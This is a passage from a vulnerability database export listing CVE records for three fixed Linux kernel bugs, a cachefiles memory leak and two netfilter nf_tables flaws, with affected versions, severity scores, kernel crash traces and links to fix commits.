"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "38e921616320d159336b0ffadb09e9fb4945c7c3",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "9cac69912052a4def571fedf1cb9bb4ec590e25a",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
},
{
"lessThan": "e21a2f17566cbd64926fb8f16323972f7a064444",
"status": "affected",
"version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/cachefiles/cache.c",
"fs/cachefiles/daemon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: fix memory leak in cachefiles_add_cache()\n\nThe following memory leak was reported after unbinding /dev/cachefiles:\n\n==================================================================\nunreferenced object 0xffff9b674176e3c0 (size 192):\n comm \"cachefilesd2\", pid 680, jiffies 4294881224\n hex dump (first 32 bytes):\n 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc ea38a44b):\n [\u003cffffffff8eb8a1a5\u003e] kmem_cache_alloc+0x2d5/0x370\n [\u003cffffffff8e917f86\u003e] prepare_creds+0x26/0x2e0\n [\u003cffffffffc002eeef\u003e] cachefiles_determine_cache_security+0x1f/0x120\n [\u003cffffffffc00243ec\u003e] cachefiles_add_cache+0x13c/0x3a0\n [\u003cffffffffc0025216\u003e] cachefiles_daemon_write+0x146/0x1c0\n [\u003cffffffff8ebc4a3b\u003e] vfs_write+0xcb/0x520\n [\u003cffffffff8ebc5069\u003e] ksys_write+0x69/0xf0\n [\u003cffffffff8f6d4662\u003e] do_syscall_64+0x72/0x140\n [\u003cffffffff8f8000aa\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0x76\n==================================================================\n\nPut the reference count of cache_cred in cachefiles_daemon_unbind() to\nfix the problem. And also put cache_cred in cachefiles_add_cache() error\nbranch to avoid memory leaks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:42.799Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cb5466783793e66272624cf71925ae1d1ba32083"
},
{
"url": "https://git.kernel.org/stable/c/037d5a949b0455540ef9aab34c10ddf54b65d285"
},
{
"url": "https://git.kernel.org/stable/c/43eccc5823732ba6daab2511ed32dfc545a666d8"
},
{
"url": "https://git.kernel.org/stable/c/94965be37add0983672e48ecb33cdbda92b62579"
},
{
"url": "https://git.kernel.org/stable/c/8b218e2f0a27a9f09428b1847b4580640b9d1e58"
},
{
"url": "https://git.kernel.org/stable/c/38e921616320d159336b0ffadb09e9fb4945c7c3"
},
{
"url": "https://git.kernel.org/stable/c/9cac69912052a4def571fedf1cb9bb4ec590e25a"
},
{
"url": "https://git.kernel.org/stable/c/e21a2f17566cbd64926fb8f16323972f7a064444"
}
],
"title": "cachefiles: fix memory leak in cachefiles_add_cache()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26840",
"datePublished": "2024-04-17T10:10:06.180Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2025-05-04T08:57:42.799Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35899 (GCVE-0-2024-35899)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: flush pending destroy work before exit_net release
Similar to 2c9f0293280e ("netfilter: nf_tables: flush pending destroy
work before netlink notifier") to address a race between exit_net and
the destroy workqueue.
The trace below shows an element to be released via destroy workqueue
while exit_net path (triggered via module removal) has already released
the set that is used in such transaction.
[ 1360.547789] BUG: KASAN: slab-use-after-free in nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]
[ 1360.547861] Read of size 8 at addr ffff888140500cc0 by task kworker/4:1/152465
[ 1360.547870] CPU: 4 PID: 152465 Comm: kworker/4:1 Not tainted 6.8.0+ #359
[ 1360.547882] Workqueue: events nf_tables_trans_destroy_work [nf_tables]
[ 1360.547984] Call Trace:
[ 1360.547991] <TASK>
[ 1360.547998] dump_stack_lvl+0x53/0x70
[ 1360.548014] print_report+0xc4/0x610
[ 1360.548026] ? __virt_addr_valid+0xba/0x160
[ 1360.548040] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 1360.548054] ? nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]
[ 1360.548176] kasan_report+0xae/0xe0
[ 1360.548189] ? nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]
[ 1360.548312] nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]
[ 1360.548447] ? __pfx_nf_tables_trans_destroy_work+0x10/0x10 [nf_tables]
[ 1360.548577] ? _raw_spin_unlock_irq+0x18/0x30
[ 1360.548591] process_one_work+0x2f1/0x670
[ 1360.548610] worker_thread+0x4d3/0x760
[ 1360.548627] ? __pfx_worker_thread+0x10/0x10
[ 1360.548640] kthread+0x16b/0x1b0
[ 1360.548653] ? __pfx_kthread+0x10/0x10
[ 1360.548665] ret_from_fork+0x2f/0x50
[ 1360.548679] ? __pfx_kthread+0x10/0x10
[ 1360.548690] ret_from_fork_asm+0x1a/0x30
[ 1360.548707] </TASK>
[ 1360.548719] Allocated by task 192061:
[ 1360.548726] kasan_save_stack+0x20/0x40
[ 1360.548739] kasan_save_track+0x14/0x30
[ 1360.548750] __kasan_kmalloc+0x8f/0xa0
[ 1360.548760] __kmalloc_node+0x1f1/0x450
[ 1360.548771] nf_tables_newset+0x10c7/0x1b50 [nf_tables]
[ 1360.548883] nfnetlink_rcv_batch+0xbc4/0xdc0 [nfnetlink]
[ 1360.548909] nfnetlink_rcv+0x1a8/0x1e0 [nfnetlink]
[ 1360.548927] netlink_unicast+0x367/0x4f0
[ 1360.548935] netlink_sendmsg+0x34b/0x610
[ 1360.548944] ____sys_sendmsg+0x4d4/0x510
[ 1360.548953] ___sys_sendmsg+0xc9/0x120
[ 1360.548961] __sys_sendmsg+0xbe/0x140
[ 1360.548971] do_syscall_64+0x55/0x120
[ 1360.548982] entry_SYSCALL_64_after_hwframe+0x55/0x5d
[ 1360.548994] Freed by task 192222:
[ 1360.548999] kasan_save_stack+0x20/0x40
[ 1360.549009] kasan_save_track+0x14/0x30
[ 1360.549019] kasan_save_free_info+0x3b/0x60
[ 1360.549028] poison_slab_object+0x100/0x180
[ 1360.549036] __kasan_slab_free+0x14/0x30
[ 1360.549042] kfree+0xb6/0x260
[ 1360.549049] __nft_release_table+0x473/0x6a0 [nf_tables]
[ 1360.549131] nf_tables_exit_net+0x170/0x240 [nf_tables]
[ 1360.549221] ops_exit_list+0x50/0xa0
[ 1360.549229] free_exit_list+0x101/0x140
[ 1360.549236] unregister_pernet_operations+0x107/0x160
[ 1360.549245] unregister_pernet_subsys+0x1c/0x30
[ 1360.549254] nf_tables_module_exit+0x43/0x80 [nf_tables]
[ 1360.549345] __do_sys_delete_module+0x253/0x370
[ 1360.549352] do_syscall_64+0x55/0x120
[ 1360.549360] entry_SYSCALL_64_after_hwframe+0x55/0x5d
(gdb) list *__nft_release_table+0x473
0x1e033 is in __nft_release_table (net/netfilter/nf_tables_api.c:11354).
11349 list_for_each_entry_safe(flowtable, nf, &table->flowtables, list) {
11350 list_del(&flowtable->list);
11351 nft_use_dec(&table->use);
11352 nf_tables_flowtable_destroy(flowtable);
11353 }
11354 list_for_each_entry_safe(set, ns, &table->sets, list) {
11355 list_del(&set->list);
11356 nft_use_dec(&table->use);
11357 if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
11358 nft_map_deactivat
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 Version: 0935d558840099b3679c67bb7468dc78fcbad940 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f4e14695fe80",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "46c4481938e2",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f7e3c88cc2a9",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4e8447a9a3d3",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "333b5085522c",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d2c9eb19fc3b",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "24cea9677025",
"status": "affected",
"version": "0935d5588400",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.5",
"status": "unaffected",
"version": "5.4.274",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.20:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.20"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.215",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.154",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.85",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.26",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35899",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:12:26.045912Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:12:59.375Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.989Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4e14695fe805eb0f0cb36e0ad6a560b9f985e86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46c4481938e2ca62343b16ea83ab28f4c1733d31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f7e3c88cc2a977c2b9a8aa52c1ce689e7b394e49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e8447a9a3d367b5065a0b7abe101da6e0037b6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/333b5085522cf1898d5a0d92616046b414f631a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d2c9eb19fc3b11caebafde4c30a76a49203d18a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24cea9677025e0de419989ecb692acd4bb34cac2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f4e14695fe805eb0f0cb36e0ad6a560b9f985e86",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "46c4481938e2ca62343b16ea83ab28f4c1733d31",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "f7e3c88cc2a977c2b9a8aa52c1ce689e7b394e49",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "4e8447a9a3d367b5065a0b7abe101da6e0037b6e",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "333b5085522cf1898d5a0d92616046b414f631a7",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "d2c9eb19fc3b11caebafde4c30a76a49203d18a6",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
},
{
"lessThan": "24cea9677025e0de419989ecb692acd4bb34cac2",
"status": "affected",
"version": "0935d558840099b3679c67bb7468dc78fcbad940",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: flush pending destroy work before exit_net release\n\nSimilar to 2c9f0293280e (\"netfilter: nf_tables: flush pending destroy\nwork before netlink notifier\") to address a race between exit_net and\nthe destroy workqueue.\n\nThe trace below shows an element to be released via destroy workqueue\nwhile exit_net path (triggered via module removal) has already released\nthe set that is used in such transaction.\n\n[ 1360.547789] BUG: KASAN: slab-use-after-free in nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]\n[ 1360.547861] Read of size 8 at addr ffff888140500cc0 by task kworker/4:1/152465\n[ 1360.547870] CPU: 4 PID: 152465 Comm: kworker/4:1 Not tainted 6.8.0+ #359\n[ 1360.547882] Workqueue: events nf_tables_trans_destroy_work [nf_tables]\n[ 1360.547984] Call Trace:\n[ 1360.547991] \u003cTASK\u003e\n[ 1360.547998] dump_stack_lvl+0x53/0x70\n[ 1360.548014] print_report+0xc4/0x610\n[ 1360.548026] ? __virt_addr_valid+0xba/0x160\n[ 1360.548040] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 1360.548054] ? nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]\n[ 1360.548176] kasan_report+0xae/0xe0\n[ 1360.548189] ? nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]\n[ 1360.548312] nf_tables_trans_destroy_work+0x3f5/0x590 [nf_tables]\n[ 1360.548447] ? __pfx_nf_tables_trans_destroy_work+0x10/0x10 [nf_tables]\n[ 1360.548577] ? _raw_spin_unlock_irq+0x18/0x30\n[ 1360.548591] process_one_work+0x2f1/0x670\n[ 1360.548610] worker_thread+0x4d3/0x760\n[ 1360.548627] ? __pfx_worker_thread+0x10/0x10\n[ 1360.548640] kthread+0x16b/0x1b0\n[ 1360.548653] ? __pfx_kthread+0x10/0x10\n[ 1360.548665] ret_from_fork+0x2f/0x50\n[ 1360.548679] ? __pfx_kthread+0x10/0x10\n[ 1360.548690] ret_from_fork_asm+0x1a/0x30\n[ 1360.548707] \u003c/TASK\u003e\n\n[ 1360.548719] Allocated by task 192061:\n[ 1360.548726] kasan_save_stack+0x20/0x40\n[ 1360.548739] kasan_save_track+0x14/0x30\n[ 1360.548750] __kasan_kmalloc+0x8f/0xa0\n[ 1360.548760] __kmalloc_node+0x1f1/0x450\n[ 1360.548771] nf_tables_newset+0x10c7/0x1b50 [nf_tables]\n[ 1360.548883] nfnetlink_rcv_batch+0xbc4/0xdc0 [nfnetlink]\n[ 1360.548909] nfnetlink_rcv+0x1a8/0x1e0 [nfnetlink]\n[ 1360.548927] netlink_unicast+0x367/0x4f0\n[ 1360.548935] netlink_sendmsg+0x34b/0x610\n[ 1360.548944] ____sys_sendmsg+0x4d4/0x510\n[ 1360.548953] ___sys_sendmsg+0xc9/0x120\n[ 1360.548961] __sys_sendmsg+0xbe/0x140\n[ 1360.548971] do_syscall_64+0x55/0x120\n[ 1360.548982] entry_SYSCALL_64_after_hwframe+0x55/0x5d\n\n[ 1360.548994] Freed by task 192222:\n[ 1360.548999] kasan_save_stack+0x20/0x40\n[ 1360.549009] kasan_save_track+0x14/0x30\n[ 1360.549019] kasan_save_free_info+0x3b/0x60\n[ 1360.549028] poison_slab_object+0x100/0x180\n[ 1360.549036] __kasan_slab_free+0x14/0x30\n[ 1360.549042] kfree+0xb6/0x260\n[ 1360.549049] __nft_release_table+0x473/0x6a0 [nf_tables]\n[ 1360.549131] nf_tables_exit_net+0x170/0x240 [nf_tables]\n[ 1360.549221] ops_exit_list+0x50/0xa0\n[ 1360.549229] free_exit_list+0x101/0x140\n[ 1360.549236] unregister_pernet_operations+0x107/0x160\n[ 1360.549245] unregister_pernet_subsys+0x1c/0x30\n[ 1360.549254] nf_tables_module_exit+0x43/0x80 [nf_tables]\n[ 1360.549345] __do_sys_delete_module+0x253/0x370\n[ 1360.549352] do_syscall_64+0x55/0x120\n[ 1360.549360] entry_SYSCALL_64_after_hwframe+0x55/0x5d\n\n(gdb) list *__nft_release_table+0x473\n0x1e033 is in __nft_release_table (net/netfilter/nf_tables_api.c:11354).\n11349 list_for_each_entry_safe(flowtable, nf, \u0026table-\u003eflowtables, list) {\n11350 list_del(\u0026flowtable-\u003elist);\n11351 nft_use_dec(\u0026table-\u003euse);\n11352 nf_tables_flowtable_destroy(flowtable);\n11353 }\n11354 list_for_each_entry_safe(set, ns, \u0026table-\u003esets, list) {\n11355 list_del(\u0026set-\u003elist);\n11356 nft_use_dec(\u0026table-\u003euse);\n11357 if (set-\u003eflags \u0026 (NFT_SET_MAP | NFT_SET_OBJECT))\n11358 nft_map_deactivat\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:56.404Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f4e14695fe805eb0f0cb36e0ad6a560b9f985e86"
},
{
"url": "https://git.kernel.org/stable/c/46c4481938e2ca62343b16ea83ab28f4c1733d31"
},
{
"url": "https://git.kernel.org/stable/c/f7e3c88cc2a977c2b9a8aa52c1ce689e7b394e49"
},
{
"url": "https://git.kernel.org/stable/c/4e8447a9a3d367b5065a0b7abe101da6e0037b6e"
},
{
"url": "https://git.kernel.org/stable/c/333b5085522cf1898d5a0d92616046b414f631a7"
},
{
"url": "https://git.kernel.org/stable/c/d2c9eb19fc3b11caebafde4c30a76a49203d18a6"
},
{
"url": "https://git.kernel.org/stable/c/24cea9677025e0de419989ecb692acd4bb34cac2"
}
],
"title": "netfilter: nf_tables: flush pending destroy work before exit_net release",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35899",
"datePublished": "2024-05-19T08:34:53.267Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:56.404Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26835 (GCVE-0-2024-26835)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: set dormant flag on hook register failure
We need to set the dormant flag again if we fail to register
the hooks.
During memory pressure hook registration can fail and we end up
with a table marked as active but no registered hooks.
On table/base chain deletion, nf_tables will attempt to unregister
the hook again which yields a warn splat from the nftables core.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
